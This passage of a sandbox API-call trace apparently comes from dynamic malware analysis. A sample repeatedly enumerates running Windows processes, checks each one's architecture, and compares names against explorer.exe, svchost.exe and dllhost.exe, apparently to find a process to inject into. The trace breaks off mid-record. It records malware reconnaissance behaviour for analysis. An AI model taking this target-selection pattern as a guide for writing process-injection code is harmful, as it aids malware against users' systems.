Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x480, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xc, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="spoolsv.exe")) returned 1 [0254.566] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x480) returned 0x0 [0254.566] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x4ac, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskhost.exe")) returned 1 [0254.566] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x4ac) returned 0xd8 [0254.566] IsWow64Process (in: hProcess=0xd8, Wow64Process=0x10fb58 | out: Wow64Process=0x10fb58) returned 1 [0254.566] CloseHandle (hObject=0xd8) returned 1 [0254.566] lstrcmpiA (lpString1="taskhost.exe", lpString2="explorer.exe") returned 1 [0254.566] lstrcmpiA (lpString1="taskhost.exe", lpString2="svchost.exe") returned 1 [0254.566] lstrcmpiA (lpString1="taskhost.exe", lpString2="dllhost.exe") returned 1 [0254.566] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x4d4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x12, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0254.567] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x4d4) returned 0x0 [0254.567] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x50c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x36c, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskeng.exe")) returned 1 [0254.567] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x50c) returned 0x0 [0254.567] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xc4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="abortion-serbia-effect.exe")) returned 1 [0254.568] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xc4) returned 0xd8 [0254.568] IsWow64Process (in: hProcess=0xd8, Wow64Process=0x10fb58 | out: Wow64Process=0x10fb58) returned 1 [0254.568] CloseHandle (hObject=0xd8) returned 1 [0254.568] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x62c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="beverages-tapes-dod.exe")) returned 1 [0254.568] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x62c) returned 0xd8 [0254.569] IsWow64Process (in: hProcess=0xd8, Wow64Process=0x10fb58 | out: Wow64Process=0x10fb58) returned 1 [0254.569] CloseHandle (hObject=0xd8) returned 1 [0254.569] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x5a4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="receptor paintings.exe")) returned 1 [0254.569] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x5a4) returned 0xd8 [0254.570] IsWow64Process (in: hProcess=0xd8, Wow64Process=0x10fb58 | out: Wow64Process=0x10fb58) returned 1 [0254.570] CloseHandle (hObject=0xd8) returned 1 [0254.570] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x780, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="definitely.exe")) returned 1 [0254.570] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x780) returned 0xd8 [0254.570] IsWow64Process (in: hProcess=0xd8, Wow64Process=0x10fb58 | out: Wow64Process=0x10fb58) returned 1 [0254.570] CloseHandle (hObject=0xd8) returned 1 [0254.570] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x240, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="knewdifferenceskaren.exe")) returned 1 [0254.571] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x240) returned 0xd8 [0254.571] IsWow64Process (in: hProcess=0xd8, Wow64Process=0x10fb58 | out: Wow64Process=0x10fb58) returned 1 [0254.571] CloseHandle (hObject=0xd8) returned 1 [0254.571] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x2c8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="whenever.exe")) returned 1 [0254.571] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x2c8) returned 0xd8 [0254.571] IsWow64Process (in: hProcess=0xd8, Wow64Process=0x10fb58 | out: Wow64Process=0x10fb58) returned 1 [0254.571] CloseHandle (hObject=0xd8) returned 1 [0254.571] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x310, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="potentially.exe")) returned 1 [0254.572] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x310) returned 0xd8 [0254.572] IsWow64Process (in: hProcess=0xd8, Wow64Process=0x10fb58 | out: Wow64Process=0x10fb58) returned 1 [0254.572] CloseHandle (hObject=0xd8) returned 1 [0254.572] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x314, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="seeker.exe")) returned 1 [0254.573] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x314) returned 0xd8 [0254.573] IsWow64Process (in: hProcess=0xd8, Wow64Process=0x10fb58 | out: Wow64Process=0x10fb58) returned 1 [0254.573] CloseHandle (hObject=0xd8) returned 1 [0254.573] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x320, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="objects-virus-israeli.exe")) returned 1 [0254.573] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x320) returned 0xd8 [0254.573] IsWow64Process (in: hProcess=0xd8, Wow64Process=0x10fb58 | out: Wow64Process=0x10fb58) returned 1 [0254.573] CloseHandle (hObject=0xd8) returned 1 [0254.573] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x7a4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="birth bean.exe")) returned 1 [0254.574] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x7a4) returned 0xd8 [0254.574] IsWow64Process (in: hProcess=0xd8, Wow64Process=0x10fb58 | out: Wow64Process=0x10fb58) returned 1 [0254.574] CloseHandle (hObject=0xd8) returned 1 [0254.574] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x688, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="ruby.exe")) returned 1 [0254.574] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x688) returned 0xd8 [0254.574] IsWow64Process (in: hProcess=0xd8, Wow64Process=0x10fb58 | out: Wow64Process=0x10fb58) returned 1 [0254.574] CloseHandle (hObject=0xd8) returned 1 [0254.574] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x7f0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="zoodiffer.exe")) returned 1 [0254.575] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x7f0) returned 0xd8 [0254.575] IsWow64Process (in: hProcess=0xd8, Wow64Process=0x10fb58 | out: Wow64Process=0x10fb58) returned 1 [0254.575] CloseHandle (hObject=0xd8) returned 1 [0254.575] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x7d4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="smith.exe")) returned 1 [0254.575] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x7d4) returned 0xd8 [0254.575] IsWow64Process (in: hProcess=0xd8, Wow64Process=0x10fb58 | out: Wow64Process=0x10fb58) returned 1 [0254.575] CloseHandle (hObject=0xd8) returned 1 [0254.576] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x58c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="spicedespite.exe")) returned 1 [0254.576] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x58c) returned 0xd8 [0254.576] IsWow64Process (in: hProcess=0xd8, Wow64Process=0x10fb58 | out: Wow64Process=0x10fb58) returned 1 [0254.576] CloseHandle (hObject=0xd8) returned 1 [0254.576] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x644, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="wooden.exe")) returned 1 [0254.577] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x644) returned 0xd8 [0254.577] IsWow64Process (in: hProcess=0xd8, Wow64Process=0x10fb58 | out: Wow64Process=0x10fb58) returned 1 [0254.577] CloseHandle (hObject=0xd8) returned 1 [0254.577] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x7e0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="dallasr.exe")) returned 1 [0254.577] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x7e0) returned 0xd8 [0254.577] IsWow64Process (in: hProcess=0xd8, Wow64Process=0x10fb58 | out: Wow64Process=0x10fb58) returned 1 [0254.577] CloseHandle (hObject=0xd8) returned 1 [0254.577] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x5d8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="bags shakira tourism.exe")) returned 1 [0254.578] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x5d8) returned 0xd8 [0254.578] IsWow64Process (in: hProcess=0xd8, Wow64Process=0x10fb58 | out: Wow64Process=0x10fb58) returned 1 [0254.578] CloseHandle (hObject=0xd8) returned 1 [0254.578] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x7d8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="constadvertisement.exe")) returned 1 [0254.578] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x7d8) returned 0xd8 [0254.578] IsWow64Process (in: hProcess=0xd8, Wow64Process=0x10fb58 | out: Wow64Process=0x10fb58) returned 1 [0254.578] CloseHandle (hObject=0xd8) returned 1 [0254.578] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x2ac, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="sensors-democrat.exe")) returned 1 [0254.579] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x2ac) returned 0xd8 [0254.579] IsWow64Process (in: hProcess=0xd8, Wow64Process=0x10fb58 | out: Wow64Process=0x10fb58) returned 1 [0254.579] CloseHandle (hObject=0xd8) returned 1 [0254.579] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x7fc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="doctrine alcohol.exe")) returned 1 [0254.579] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x7fc) returned 0xd8 [0254.579] IsWow64Process (in: hProcess=0xd8, Wow64Process=0x10fb58 | out: Wow64Process=0x10fb58) returned 1 [0254.580] CloseHandle (hObject=0xd8) returned 1 [0254.580] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x53c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="population openings.exe")) returned 1 [0254.580] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x53c) returned 0xd8 [0254.580] IsWow64Process (in: hProcess=0xd8, Wow64Process=0x10fb58 | out: Wow64Process=0x10fb58) returned 1 [0254.580] CloseHandle (hObject=0xd8) returned 1 [0254.580] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x6b4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x254, pcPriClassBase=8, dwFlags=0x0, szExeFile="WmiPrvSE.exe")) returned 1 [0254.581] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x6b4) returned 0x0 [0254.581] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xa38, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0254.581] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xa38) returned 0x0 [0254.581] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xa58, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="sppsvc.exe")) returned 1 [0254.582] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xa58) returned 0x0 [0254.582] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xa70, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xd, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0254.582] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xa70) returned 0x0 [0254.582] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xb00, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskhost.exe")) returned 1 [0254.583] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xb00) returned 0x0 [0254.583] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xbdc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1a, th32ParentProcessID=0x1b0, pcPriClassBase=8, dwFlags=0x0, szExeFile="explorer.exe")) returned 1 [0254.583] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xbdc) returned 0xd8 [0254.583] IsWow64Process (in: hProcess=0xd8, Wow64Process=0x10fb58 | out: Wow64Process=0x10fb58) returned 1 [0254.583] CloseHandle (hObject=0xd8) returned 1 [0254.583] lstrcmpiA (lpString1="explorer.exe", lpString2="explorer.exe") returned 0 [0254.583] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x790, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x36c, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskeng.exe")) returned 1 [0254.584] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x790) returned 0xd8 [0254.584] IsWow64Process (in: hProcess=0xd8, Wow64Process=0x10fb58 | out: Wow64Process=0x10fb58) returned 1 [0254.584] CloseHandle (hObject=0xd8) returned 1 [0254.584] lstrcmpiA (lpString1="taskeng.exe", lpString2="explorer.exe") returned 1 [0254.584] lstrcmpiA (lpString1="taskeng.exe", lpString2="svchost.exe") returned 1 [0254.584] lstrcmpiA (lpString1="taskeng.exe", lpString2="dllhost.exe") returned 1 [0254.584] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x92c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0xbdc, pcPriClassBase=8, dwFlags=0x0, szExeFile="explorer.exe")) returned 1 [0254.584] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x92c) returned 0xd8 [0254.584] IsWow64Process (in: hProcess=0xd8, Wow64Process=0x10fb58 | out: Wow64Process=0x10fb58) returned 1 [0254.584] CloseHandle (hObject=0xd8) returned 1 [0254.584] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x924, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0xbdc, pcPriClassBase=8, dwFlags=0x0, szExeFile="explorer.exe")) returned 1 [0254.585] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x924) returned 0xd8 [0254.585] IsWow64Process (in: hProcess=0xd8, Wow64Process=0x10fb58 | out: Wow64Process=0x10fb58) returned 1 [0254.585] CloseHandle (hObject=0xd8) returned 1 [0254.585] lstrcmpiA (lpString1="explorer.exe", lpString2="explorer.exe") returned 0 [0254.585] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x958, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0xbdc, pcPriClassBase=8, dwFlags=0x0, szExeFile="explorer.exe")) returned 1 [0254.586] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x958) returned 0xd8 [0254.586] IsWow64Process (in: hProcess=0xd8, Wow64Process=0x10fb58 | out: Wow64Process=0x10fb58) returned 1 [0254.586] CloseHandle (hObject=0xd8) returned 1 [0254.586] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x954, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0xbdc, pcPriClassBase=8, dwFlags=0x0, szExeFile="explorer.exe")) returned 1 [0254.586] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x954, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0xbdc, pcPriClassBase=8, dwFlags=0x0, szExeFile="explorer.exe")) returned 0 [0254.587] CloseHandle (hObject=0xd4) returned 1 [0254.587] Sleep (dwMilliseconds=0x3e8) [0255.607] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0xd4 [0255.609] Process32First (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0255.609] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x0) returned 0x0 [0255.609] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x50, th32ParentProcessID=0x0, pcPriClassBase=8, dwFlags=0x0, szExeFile="System")) returned 1 [0255.610] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x4) returned 0x0 [0255.610] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x104, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x4, pcPriClassBase=11, dwFlags=0x0, szExeFile="smss.exe")) returned 1 [0255.610] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x104) returned 0x0 [0255.610] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x148, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x140, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0255.611] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x148) returned 0x0 [0255.611] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x17c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0x140, pcPriClassBase=13, dwFlags=0x0, szExeFile="wininit.exe")) returned 1 [0255.611] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x17c) returned 0x0 [0255.611] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x188, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x174, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0255.612] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x188) returned 0x0 [0255.612] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1b0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0x174, pcPriClassBase=13, dwFlags=0x0, szExeFile="winlogon.exe")) returned 1 [0255.612] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x1b0) returned 0x0 [0255.612] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1cc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x17c, pcPriClassBase=9, dwFlags=0x0, szExeFile="services.exe")) returned 1 [0255.613] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x1cc) returned 0x0 [0255.613] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1d4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x17c, pcPriClassBase=9, dwFlags=0x0, szExeFile="lsass.exe")) returned 1 [0255.613] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x1d4) returned 0x0 [0255.613] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1dc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x9, th32ParentProcessID=0x17c, pcPriClassBase=8, dwFlags=0x0, szExeFile="lsm.exe")) returned 1 [0255.614] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x1dc) returned 0x0 [0255.614] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x254, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0255.614] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x254) returned 0x0 [0255.614] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x298, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0255.615] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x298) returned 0x0 [0255.615] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x2cc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x12, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0255.615] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x2cc) returned 0x0 [0255.615] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x334, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x13, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0255.616] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x334) returned 0x0 [0255.616] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x36c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1f, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0255.616] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x36c) returned 0x0 [0255.616] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x3a8, 